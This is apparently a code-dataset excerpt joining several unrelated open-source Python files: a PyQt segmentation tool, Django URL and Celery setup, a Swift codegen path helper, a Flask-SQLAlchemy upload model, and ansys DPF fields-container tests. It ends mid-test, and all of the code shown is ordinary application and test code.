cv2.circle(self.segment_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2),
(255, 255, 255),
int(thinkness / 2))
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.mode == 'dextr':
if not self.IsAdd and not self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
if len(self.extreme_points_ori) < 4:
cv2.circle(self.overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2), (0, 255, 0),
4)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
self.extreme_points_ori.append((self.seedStartX, self.seedStartY))
else:
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
print('You can only input 4 extreme points!')
else:
if len(self.extreme_points_ori) < 4:
cv2.circle(self.segment_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2),
(0, 255, 0),
4)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
self.extreme_points_ori.append((self.seedStartX, self.seedStartY))
else:
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
print('You can only input 4 extreme points!')
elif self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
print('You cannot wipe any pixels until you finish at least one segmentation!')
else:
cv2.circle(self.segment_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2), (0, 0, 0),
int(thinkness / 2))
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.IsAdd:
if len(np.unique(self.segment_overlay)) <= 1:
print('You cannot add any pixels until you finish at least one segmentation!')
else:
cv2.circle(self.segment_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2),
(255, 255, 255),
int(thinkness / 2))
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
def mouse_drag(self, event):
thinkness = int(self.thinkness.text())
self.seedReleaseX = event.x()
self.seedReleaseY = event.y()
temp_overlay = self.get_image_with_overlay()
if self.mode == 'graphcut':
if not self.IsAdd and not self.IsEraser:
if self.seed_type == 1:
cv2.line(temp_overlay, (self.seedStartX, self.seedStartY), (self.seedReleaseX, self.seedReleaseY),
(255, 255, 255), thinkness)
else:
cv2.line(temp_overlay, (self.seedStartX, self.seedStartY), (self.seedReleaseX, self.seedReleaseY),
(0, 0, 255), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(temp_overlay)))
elif self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(0, 0, 0), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.IsAdd:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(255, 255, 255), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.mode == 'dextr':
if not self.IsAdd and not self.IsEraser:
pass
elif self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(0, 0, 0), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.IsAdd:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(255, 255, 255), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
def mouse_release(self, event):
thinkness = int(self.thinkness.text())
if self.mode == 'graphcut':
if not self.IsAdd and not self.IsEraser:
if self.seed_type == 1:
cv2.line(self.overlay, (self.seedStartX, self.seedStartY), (self.seedReleaseX, self.seedReleaseY),
(255, 255, 255), thinkness)
else:
cv2.line(self.overlay, (self.seedStartX, self.seedStartY), (self.seedReleaseX, self.seedReleaseY),
(0, 0, 255), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
elif self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(0, 0, 0), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.IsAdd:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(255, 255, 255), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.mode == 'dextr':
if not self.IsAdd and not self.IsEraser:
pass
elif self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(0, 0, 0), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.IsAdd:
if len(np.unique(self.segment_overlay)) <= 1:
pass
else:
cv2.line(self.segment_overlay, (self.seedStartX, self.seedStartY),
(self.seedReleaseX, self.seedReleaseY),
(255, 255, 255), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
@pyqtSlot()
def on_graphcut(self):
if self.mode != 'graphcut':
print('Using GRAPH CUT')
self.mode = 'graphcut'
self.IsAdd = False
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:white")
self.segment_overlay = np.zeros_like(self.image)
self.extreme_points_ori = []
self.overlay = np.zeros_like(self.image)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
self.graphcutButton.setStyleSheet("background-color:gray")
self.dextrButton.setStyleSheet("background-color:white")
@pyqtSlot()
def on_dextr(self):
if self.mode != 'dextr':
print('Using DEXTR CUT')
self.mode = 'dextr'
self.IsAdd = False
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:white")
self.segment_overlay = np.zeros_like(self.image)
self.extreme_points_ori = []
self.overlay = np.zeros_like(self.image)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
self.graphcutButton.setStyleSheet("background-color:white")
self.dextrButton.setStyleSheet("background-color:gray")
@pyqtSlot()
def on_eraser(self):
if not self.IsEraser:
self.IsEraser = True
self.IsAdd = False
self.addButton.setStyleSheet("background-color:white")
self.eraserButton.setStyleSheet("background-color:gray")
else:
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
@pyqtSlot()
def on_add(self):
if not self.IsAdd:
self.IsAdd = True
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:gray")
else:
self.IsAdd = False
self.addButton.setStyleSheet("background-color:white")
@pyqtSlot()
def on_segment(self):
if self.mode == 'graphcut':
graph_maker = GraphMaker.GraphMaker(self.image)
height, width = np.shape(self.overlay)[:2]
for i in range(height):
for j in range(width):
if self.overlay[i, j, 0] != 0 or self.overlay[i, j, 1] != 0 or self.overlay[i, j, 2] != 0:
if self.overlay[i, j, 0] == 0 and self.overlay[i, j, 2] >= 200:
graph_maker.add_seed(j, i, 0)
elif self.overlay[i, j, 1] >= 200:
graph_maker.add_seed(j, i, 1)
graph_maker.create_graph()
self.segment_overlay = graph_maker.segment_overlay
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.mode == 'dextr':
if self.flag:
if torch.cuda.is_available():
self.gpu_id = 0
self.net = resnet.resnet101(1, nInputChannels=4, classifier='psp')
print("Initializing weights from: {}".format(os.path.join(Path.models_dir(), self.modelName + '.pth')))
state_dict_checkpoint = torch.load(os.path.join(Path.models_dir(), self.modelName + '.pth'),
map_location=lambda storage, loc: storage)
# Remove the prefix .module from the model when it is trained using DataParallel
if 'module.' in list(state_dict_checkpoint.keys())[0]:
new_state_dict = OrderedDict()
for k, v in state_dict_checkpoint.items():
name = k[7:] # remove `module.` from multi-gpu training
new_state_dict[name] = v
else:
new_state_dict = state_dict_checkpoint
self.net.load_state_dict(new_state_dict)
self.net.eval()
if self.gpu_id >= 0:
torch.cuda.set_device(device=self.gpu_id)
self.net.cuda()
self.flag = False
image = np.array(self.image)
height, width = np.shape(image)[:2]
b, g, r = cv2.split(image)
image = cv2.merge([r, g, b])
extreme_points_ori = np.array(self.extreme_points_ori).astype(np.int)
bbox = utils.get_bbox(image, points=extreme_points_ori, pad=self.pad, zero_pad=True)
crop_image = utils.crop_from_bbox(image, bbox, zero_pad=True)
resize_image = utils.fixed_resize(crop_image, (512, 512)).astype(np.float32)
# Generate extreme point heat map normalized to image values
extreme_points = extreme_points_ori - [np.min(extreme_points_ori[:, 0]),
np.min(extreme_points_ori[:, 1])] + [self.pad,
self.pad]
extreme_points = (512 * extreme_points * [1 / crop_image.shape[1], 1 / crop_image.shape[0]]).astype(np.int)
extreme_heatmap = utils.make_gt(resize_image, extreme_points, sigma=10)
extreme_heatmap = utils.cstm_normalize(extreme_heatmap, 255)
# Concatenate inputs and convert to tensor
input_dextr = np.concatenate((resize_image, extreme_heatmap[:, :, np.newaxis]), axis=2)
input_dextr = torch.from_numpy(input_dextr.transpose((2, 0, 1))[np.newaxis, ...])
# Run a forward pass
inputs = Variable(input_dextr, requires_grad=True)
if self.gpu_id >= 0:
inputs = inputs.cuda()
with torch.no_grad():
outputs = self.net.forward(inputs)
outputs = upsample(outputs, size=(height, width), mode='bilinear', align_corners=True)
if self.gpu_id >= 0:
outputs = outputs.cpu()
pred = np.transpose(outputs.data.numpy()[0, ...], (1, 2, 0))
pred = 1 / (1 + np.exp(-pred))
pred = np.squeeze(pred)
result = utils.crop2fullmask(pred, bbox, im_size=image.shape[:2], zero_pad=True,
relax=self.pad) > self.thres
self.dextr_results.append(result)
self.extreme_points_ori = []
# self.segment_overlay = np.zeros((np.shape(image)))
overall_result = np.zeros_like(result)
for seg_result in self.dextr_results:
overall_result += seg_result
self.segment_overlay[:, :, 0][overall_result == True] = 255
self.segment_overlay[:, :, 0][overall_result == False] = 0
self.segment_overlay[:, :, 1][overall_result == True] = 255
self.segment_overlay[:, :, 1][overall_result == False] = 0
self.segment_overlay[:, :, 2][overall_result == True] = 255
self.segment_overlay[:, :, 2][overall_result == False] = 0
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
@pyqtSlot()
def on_next(self):
self.IsAdd = False
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:white")
self.dextr_results = []
self.extreme_points_ori = []
self.id += 1
if self.id > self.lenths:
self.id = 0
self.image_name = self.images[self.id]
self.image = cv2.imread(os.path.join(self.image_dir,self.image_name))
self.segment_overlay = np.zeros_like(self.image)
self.overlay = np.zeros_like(self.image)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
@pyqtSlot()
def on_last(self):
self.IsAdd = False
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:white")
self.dextr_results = []
self.extreme_points_ori = []
self.id -= 1
if self.id < 0:
self.id = self.lenths
self.image_name = self.images[self.id]
self.image = cv2.imread(os.path.join(self.image_dir,self.image_name))
self.segment_overlay = np.zeros_like(self.image)
self.overlay = np.zeros_like(self.image)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
@pyqtSlot()
def on_clear(self):
self.IsAdd = False
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:white")
self.segment_overlay = np.zeros_like(self.image)
self.extreme_points_ori = []
self.dextr_results = []
self.overlay = np.zeros_like(self.image)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
@pyqtSlot()
def on_finish(self):
# TODO: finish segmentation, save result and turn to next image
save_path = os.path.join(self.result_dir, self.image_name[:-4]+'.png')
cv2.imwrite(save_path, self.segment_overlay)
self.dextr_results = []
self.IsAdd = False
self.IsEraser = False
self.eraserButton.setStyleSheet("background-color:white")
self.addButton.setStyleSheet("background-color:white")
if self.lenths > 1:
print("{} images remained.".format(str(self.lenths)))
else:
print("{} image remained.".format(str(self.lenths)))
if self.lenths <= 0:
print("Segmentation completed. Please close the window!")
else:
self.lenths -= 1
self.completed_image_list.append(self.images[self.id])
del self.images[self.id]
self.id += 1
if self.id > self.lenths:
self.id = 0
self.image_name = self.images[self.id]
self.image = cv2.imread(os.path.join(self.image_dir, self.image_name))
self.segment_overlay = np.zeros_like(self.image)
self.overlay = np.zeros_like(self.image)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
def get_image_with_overlay(self, show_mode=0):
if show_mode == 0:
return cv2.addWeighted(self.image, 0.7, self.overlay, 1, 0.1)
elif show_mode == 1:
return cv2.addWeighted(self.image, 0.9, self.segment_overlay.astype(np.uint8), 0.6, 0.1)
else:
print('wrong number!')
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = CutUI(Path.db_root_dir(), Path.save_root_dir())
app.exec_()
| 41.104615
| 119
| 0.569055
|
9c6e15732c9c0d2244580dc8bcc893f5bda16155
| 277
|
py
|
Python
|
cotidia/cms/urls/public.py
|
guillaumepiot/cotidia-cms
|
178bfe26b65f1e45d806d6cbe4dd2ec9dae04b7b
|
[
"BSD-3-Clause"
] | null | null | null |
cotidia/cms/urls/public.py
|
guillaumepiot/cotidia-cms
|
178bfe26b65f1e45d806d6cbe4dd2ec9dae04b7b
|
[
"BSD-3-Clause"
] | null | null | null |
cotidia/cms/urls/public.py
|
guillaumepiot/cotidia-cms
|
178bfe26b65f1e45d806d6cbe4dd2ec9dae04b7b
|
[
"BSD-3-Clause"
] | null | null | null |
from django.urls import path
from cotidia.cms.views.public import page, browserconfig
app_name = 'cotidia.cms'
urlpatterns = [
path('', page, name="home"),
path('browserconfig.xml', browserconfig, name="browserconfig"),
path('<path:slug>', page, name="page"),
]
| 23.083333
| 67
| 0.689531
|
faccec200b81b8f4ea2394bf1216c62e2ca5d87e
| 495
|
py
|
Python
|
src/app/celery.py
|
tempofr/stellar-anchor-server
|
6a318e5443936d9e29c6e9592801da8fb52735b7
|
[
"Apache-2.0"
] | null | null | null |
src/app/celery.py
|
tempofr/stellar-anchor-server
|
6a318e5443936d9e29c6e9592801da8fb52735b7
|
[
"Apache-2.0"
] | null | null | null |
src/app/celery.py
|
tempofr/stellar-anchor-server
|
6a318e5443936d9e29c6e9592801da8fb52735b7
|
[
"Apache-2.0"
] | 1
|
2021-09-15T01:55:46.000Z
|
2021-09-15T01:55:46.000Z
|
"""
This module sets up Celery for the Django application.
See: https://docs.celeryproject.org/en/latest/django/first-steps-with-django.html
"""
# pylint: disable=invalid-name
from __future__ import absolute_import
import os
from celery import Celery
from django.conf import settings
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "app.settings")
app = Celery("app")
app.config_from_object("django.conf:settings", namespace="CELERY")
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
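
# A minimal sketch of a task that the autodiscovery above would pick up, assuming a
# hypothetical installed app named "payments" with a payments/tasks.py module (the
# app and task names are illustrative, not part of this project):
#
#   from app.celery import app
#
#   @app.task
#   def ping():
#       return "pong"
#
# Such a task could then be queued with `ping.delay()` once a Celery worker is running.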
| 27.5
| 81
| 0.79798
|
2ad1284b17bd7cd2811d5702c79a6dfcf17769a7
| 534
|
py
|
Python
|
swift/codegen/lib/paths.py
|
adityasharad/ql
|
439dcc0731ae665402466a13daf12737ea3a2a44
|
[
"MIT"
] | 643
|
2018-08-03T11:16:54.000Z
|
2020-04-27T23:10:55.000Z
|
swift/codegen/lib/paths.py
|
DirtyApexAlpha/codeql
|
4c59b0d2992ee0d90cc2f46d6a85ac79e1d57f21
|
[
"MIT"
] | 1,880
|
2018-08-03T11:28:32.000Z
|
2020-04-28T13:18:51.000Z
|
swift/codegen/lib/paths.py
|
DirtyApexAlpha/codeql
|
4c59b0d2992ee0d90cc2f46d6a85ac79e1d57f21
|
[
"MIT"
] | 218
|
2018-08-03T11:16:58.000Z
|
2020-04-24T02:24:00.000Z
|
""" module providing useful filesystem paths """
import pathlib
import sys
import os
try:
workspace_dir = pathlib.Path(os.environ['BUILD_WORKSPACE_DIRECTORY']).resolve() # <- means we are using bazel run
swift_dir = workspace_dir / 'swift'
except KeyError:
_this_file = pathlib.Path(__file__).resolve()
swift_dir = _this_file.parents[2]
workspace_dir = swift_dir.parent
lib_dir = swift_dir / 'codegen' / 'lib'
templates_dir = swift_dir / 'codegen' / 'templates'
exe_file = pathlib.Path(sys.argv[0]).resolve()
| 28.105263
| 118
| 0.724719
|
8a1e63a4789873894c5207a127b1bf1a6d19fd0d
| 670
|
py
|
Python
|
models/upload.py
|
dharmasastra/learning-upload-files
|
763ff744e6f2fc6654aeac647401cdfe2c084c85
|
[
"MIT"
] | null | null | null |
models/upload.py
|
dharmasastra/learning-upload-files
|
763ff744e6f2fc6654aeac647401cdfe2c084c85
|
[
"MIT"
] | null | null | null |
models/upload.py
|
dharmasastra/learning-upload-files
|
763ff744e6f2fc6654aeac647401cdfe2c084c85
|
[
"MIT"
] | null | null | null |
from db import db
class UploadModel(db.Model):
__tablename__ = 'upload'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(200), nullable=False)
avatar = db.Column(db.String(300), nullable=False)
def __init__(self, name):
self.name = name
def json(self):
return {
'id': self.id,
'name': self.name,
'avatar': self.avatar
}
def save_image(self, avatar):
self.avatar = avatar
def save_to_db(self):
db.session.add(self)
db.session.commit()
def delete_from_db(self):
db.session.delete(self)
db.session.commit()
| 22.333333
| 54
| 0.58209
|
70d2e35534cbfb31e257a327376d43e5cddabc78
| 358
|
py
|
Python
|
test/test_language_dwarvish.py
|
evilchili/telisar
|
4152de28ed03afecb579c6065414439146b8b169
|
[
"Unlicense"
] | 1
|
2018-06-29T14:46:18.000Z
|
2018-06-29T14:46:18.000Z
|
test/test_language_dwarvish.py
|
evilchili/telisar
|
4152de28ed03afecb579c6065414439146b8b169
|
[
"Unlicense"
] | null | null | null |
test/test_language_dwarvish.py
|
evilchili/telisar
|
4152de28ed03afecb579c6065414439146b8b169
|
[
"Unlicense"
] | 1
|
2018-06-29T14:47:07.000Z
|
2018-06-29T14:47:07.000Z
|
import logging
import pytest
from telisar.languages.dwarvish import Dwarvish
@pytest.fixture
def dwarvish():
e = Dwarvish()
e._logger.setLevel(logging.DEBUG)
return e
@pytest.mark.parametrize('name', [
'Moradin',
'Ultar Ultarsson',
'Julia Ultarsson',
])
def test_existing_names(dwarvish, name):
assert dwarvish.is_valid(name)
| 17.9
| 47
| 0.712291
|
f083fe77eef463a9ae1f791e0bef573688e8f349
| 20,132
|
py
|
Python
|
tests/test_fieldscontainer.py
|
pscedu/DPF-Core
|
05816d1d4940aacc2b51055ab67b8f4c31fc1ca3
|
[
"MIT"
] | null | null | null |
tests/test_fieldscontainer.py
|
pscedu/DPF-Core
|
05816d1d4940aacc2b51055ab67b8f4c31fc1ca3
|
[
"MIT"
] | null | null | null |
tests/test_fieldscontainer.py
|
pscedu/DPF-Core
|
05816d1d4940aacc2b51055ab67b8f4c31fc1ca3
|
[
"MIT"
] | null | null | null |
import weakref
import pytest
import numpy as np
from ansys.dpf.core import FieldsContainer, Field, TimeFreqSupport
from ansys.dpf.core.custom_fields_container import ElShapeFieldsContainer, BodyFieldsContainer
from ansys.dpf.core import errors as dpf_errors
from ansys.dpf.core import fields_factory
from ansys.dpf.core import examples
from ansys.dpf import core as dpf
from ansys.dpf.core import operators as ops
from conftest import local_server
@pytest.fixture()
def disp_fc(allkindofcomplexity):
"""Return a displacement fields container"""
model = dpf.Model(allkindofcomplexity)
return model.results.displacement().outputs.fields_container()
def test_create_fields_container():
fc = FieldsContainer()
assert fc._message.id != 0
def test_empty_index():
fc = FieldsContainer()
with pytest.raises(IndexError):
fc[0]
def test_createby_message_copy_fields_container():
fc= FieldsContainer()
fields_container2 = FieldsContainer(fields_container=fc._message)
assert fc._message.id == fields_container2._message.id
def test_createbycopy_fields_container():
fc= FieldsContainer()
fields_container2 = FieldsContainer(fields_container=fc)
assert fc._message.id == fields_container2._message.id
def test_set_get_field_fields_container():
fc= FieldsContainer()
fc.labels =['time','complex']
for i in range(0,20):
mscop = {"time":i+1,"complex":0}
fc.add_field(mscop,Field(nentities=i+10))
assert fc.get_available_ids_for_label() == list(range(1,21))
for i in range(0,20):
fieldid =fc.get_field({"time":i+1,"complex":0})._message.id
assert fieldid !=0
assert fc.get_field(i)._message.id !=0
assert fc.get_field_by_time_complex_ids(timeid=i+1,complexid=0)._message.id !=0
assert fc[i]._message.id != 0
def test_get_label_scoping():
fc= FieldsContainer()
fc.labels =['time','complex']
for i in range(0,20):
mscop = {"time":i+1,"complex":0}
fc.add_field(mscop,Field(nentities=i+10))
scop = fc.get_label_scoping()
assert scop._message.id != 0
assert scop.ids == list(range(1,21))
def test_set_get_field_fields_container_new_label():
fc= FieldsContainer()
fc.labels =['time','complex']
for i in range(0,20):
mscop = {"time":i+1,"complex":0}
fc.add_field(mscop,Field(nentities=i+10))
assert fc.get_available_ids_for_label() == list(range(1,21))
for i in range(0,20):
fieldid =fc.get_field({"time":i+1,"complex":0})._message.id
assert fieldid !=0
assert fc.get_field(i)._message.id !=0
assert fc.get_field_by_time_complex_ids(timeid=i+1,complexid=0)._message.id !=0
assert fc[i]._message.id != 0
assert fc.get_label_space(i)=={"time":i+1,"complex":0}
fc.add_label('shape')
for i in range(0,20):
mscop = {"time":i+1,"complex":0, 'shape':1}
fc.add_field(mscop,Field(nentities=i+10))
assert len(fc.get_fields({"time":i+1,"complex":0}))==2
for i in range(0,20):
fieldid =fc.get_field({"time":i+1,"complex":0, 'shape':1})._message.id
assert fieldid !=0
assert fc.get_field(i+20)._message.id !=0
assert fc[i]._message.id != 0
assert fc.get_label_space(i+20)=={"time":i+1,"complex":0, 'shape':1}
def test_set_get_field_fields_container_new_label_default_value():
fc= FieldsContainer()
fc.labels =['time','complex']
for i in range(0,20):
mscop = {"time":i+1,"complex":0}
fc.add_field(mscop,Field(nentities=i+10))
fc.add_label('shape',3)
for i in range(0,20):
mscop = {"time":i+1,"complex":0, 'shape':1}
fc.add_field(mscop,Field(nentities=i+10))
for i in range(0,20):
fieldid =fc.get_field({"time":i+1,"complex":0, 'shape':1})._message.id
assert fieldid !=0
assert fc.get_field(i+20)._message.id !=0
assert fc[i]._message.id != 0
assert fc.get_label_space(i+20)=={"time":i+1,"complex":0, 'shape':1}
for i in range(0,20):
fieldid =fc.get_field({"time":i+1,"complex":0, 'shape':3})._message.id
assert fieldid !=0
assert fc.get_field(i)._message.id !=0
assert fc[i]._message.id != 0
assert fc.get_label_space(i)=={"time":i+1,"complex":0, 'shape':3}
def test_get_item_field_fields_container():
fc= FieldsContainer()
fc.labels =['time','complex']
for i in range(0,20):
mscop = {"time":i+1,"complex":0}
fc.add_field(mscop,Field(nentities=i+10))
for i in range(0,20):
assert fc[i]._message.id !=0
def test_delete_fields_container():
fc = FieldsContainer()
ref = weakref.ref(fc)
del fc
assert ref() is None
def test_str_fields_container(disp_fc):
assert 'time' in str(disp_fc)
assert 'location' in str(disp_fc)
def test_support_fields_container(disp_fc):
support = disp_fc.time_freq_support
assert len(support.time_frequencies) == 1
def test_getitem_fields_container(disp_fc):
assert isinstance(disp_fc[0], dpf.Field)
def test_has_label(disp_fc):
fc = FieldsContainer()
fc.labels = ['time','complex']
assert fc.has_label('time') == True
assert fc.has_label('complex') == True
assert fc.has_label('body') == False
assert disp_fc.has_label('time') == True
assert fc.has_label('body') == False
def test_add_field_by_time_id():
fc = FieldsContainer()
fc.labels = ['time','complex']
f1 = Field(3)
f1.append([10.2, 3.0, -11.8], 1)
f1.data
f1.append([10.2, 2.0, 11.8], 2)
f1.append([10.2, 1.0, -11.8], 3)
mscop1 = {"time": 1,"complex": 0}
fc.add_field(mscop1, f1)
assert len(fc) == 1
f2 = Field(1)
f2.append([4.0, 4.4, 3.6], 1)
mscop2 = {"time": 1,"complex": 1}
fc.add_field(mscop2, f2)
assert len(fc) == 2
f3 = Field(1)
f3.append([0.0, 0.4, 0.6], 1)
fc.add_field_by_time_id(f3, 2)
field_to_compare = Field(1)
field_to_compare.append([0.0, 0.4, 0.6], 1)
field = fc.get_field({'time': 2, 'complex': 0})
assert len(fc) == 3
assert np.allclose(field.data, field_to_compare.data)
fc.add_field_by_time_id(f3, 1)
field_result_1 = fc.get_field({'time': 1, 'complex': 0})
field_result_2 = fc.get_field({'time': 2, 'complex': 0})
assert np.allclose(field_result_1.data, field_result_2.data)
fc.add_label('body')
with pytest.raises(dpf_errors.DpfValueError):
fc.add_field_by_time_id(f3, 10)
def test_add_imaginary_field():
fc = FieldsContainer()
fc.labels = ['time','complex']
f1 = Field(3)
f1.append([10.2, 3.0, -11.8], 1)
f1.append([10.2, 2.0, 11.8], 2)
f1.append([10.2, 1.0, -11.8], 3)
mscop1 = {"time": 1,"complex": 1}
fc.add_field(mscop1, f1)
assert len(fc) == 1
f2 = Field(1)
f2.append([4.0, 4.4, 3.6], 1)
mscop2 = {"time": 1,"complex": 0}
fc.add_field(mscop2, f2)
assert len(fc) == 2
f3 = Field(1)
f3.append([0.0, 0.4, 0.6], 1)
fc.add_imaginary_field(f3, 2)
field_to_compare = Field(1)
field_to_compare.append([0.0, 0.4, 0.6], 1)
field = fc.get_field({'time': 2, 'complex': 1})
assert len(fc) == 3
assert np.allclose(field.data, field_to_compare.data)
fc.add_imaginary_field(f3, 1)
field_result_1 = fc.get_field({'time': 1, 'complex': 1})
field_result_2 = fc.get_field({'time': 2, 'complex': 1})
assert np.allclose(field_result_1.data, field_result_2.data)
fc.add_label('body')
with pytest.raises(dpf_errors.DpfValueError):
fc.add_imaginary_field(f3, 10)
def test_get_imaginary_field(disp_fc):
with pytest.raises(dpf_errors.DpfValueError):
disp_fc.get_imaginary_fields(1)
fc = FieldsContainer()
fc.labels = ["complex"]
with pytest.raises(dpf_errors.DpfValueError):
fc.get_imaginary_fields(1)
fc = FieldsContainer()
fc.labels = ["time", "complex"]
field_real = Field(1)
field_real.append([0.0, 3.0, 4.1], 20)
fc.add_field({"time" : 1, "complex" : 0}, field_real)
field_to_check = fc.get_imaginary_field(1)
assert field_to_check is None
field_img = Field(1)
field_img.append([1.0, 301.2, 4.2], 20)
fc.add_field({"time" : 1, "complex" : 1}, field_img)
field_to_check_2 = fc.get_imaginary_field(1)
assert np.allclose(field_img.data, field_to_check_2.data)
def test_get_field_by_time_id():
fc = FieldsContainer()
fc.labels = ["complex"]
with pytest.raises(dpf_errors.DpfValueError):
fc.get_field_by_time_id(1)
fc = FieldsContainer()
fc.labels = ["time", "complex"]
field_img = Field(1)
field_img.append([0.0, 3.0, 4.1], 20)
fc.add_field({"time" : 1, "complex" : 1}, field_img)
field_to_check = fc.get_field_by_time_id(1)
assert field_to_check is None
field_real = Field(1)
field_real.append([1.0, 301.2, 4.2], 20)
fc.add_field({"time" : 1, "complex" : 0}, field_real)
field_to_check_2 = fc.get_field_by_time_id(1)
assert np.allclose(field_real.data, field_to_check_2.data)
fc2 = FieldsContainer()
fc2.labels = ["time"]
f1 = Field(1)
f1.append([0.0, 3.0, 4.1], 20)
fc.add_field({"time" : 1, "complex" : 0}, f1)
field_to_check = fc.get_field_by_time_id(1)
assert np.allclose(f1.data, field_to_check.data)
def test_collection_update_support():
# set time_freq_support
fc = FieldsContainer()
tfq = TimeFreqSupport()
frequencies = fields_factory.create_scalar_field(3)
frequencies.data = [0.1, 0.32, 0.4]
tfq.time_frequencies = frequencies
fc.time_freq_support = tfq
# get time_freq_support
tfq_check = fc.time_freq_support
assert np.allclose(tfq.time_frequencies.data, tfq_check.time_frequencies.data)
def test_deep_copy_over_time_fields_container(velocity_acceleration):
model = dpf.Model(velocity_acceleration)
stress = model.results.stress(time_scoping=[1,2,3])
fc = stress.outputs.fields_container()
copy = fc.deep_copy()
idenfc = dpf.operators.logic.identical_fc(fc,copy)
assert idenfc.outputs.boolean()
tf = fc.time_freq_support
copy = copy.time_freq_support
assert np.allclose(tf.time_frequencies.data, copy.time_frequencies.data)
assert tf.time_frequencies.scoping.ids == copy.time_frequencies.scoping.ids
def test_light_copy():
fc = FieldsContainer()
fc.labels = ["time"]
field = Field(1)
field.append([0.0, 3.0, 4.1], 20)
fc.add_field({"time" : 1}, field)
assert fc[0]!=None
fc2 = FieldsContainer(fields_container=fc)
assert fc2[0]!=None
fc=2
assert fc2[0]!=None
def test_el_shape_fc(allkindofcomplexity):
model = dpf.Model(allkindofcomplexity)
fc = model.results.stress.split_by_shape.eval()
assert isinstance(fc, ElShapeFieldsContainer)
assert len(fc.beam_fields())==1
assert len(fc.shell_fields())==1
assert len(fc.solid_fields())==1
mesh =model.metadata.meshed_region
f = fc.beam_field()
for id in f.scoping.ids :
assert mesh.elements.element_by_id(id).shape =="beam"
f = fc.shell_field()
for id in f.scoping.ids :
assert mesh.elements.element_by_id(id).shape =="shell"
f = fc.solid_field()
for id in f.scoping.ids :
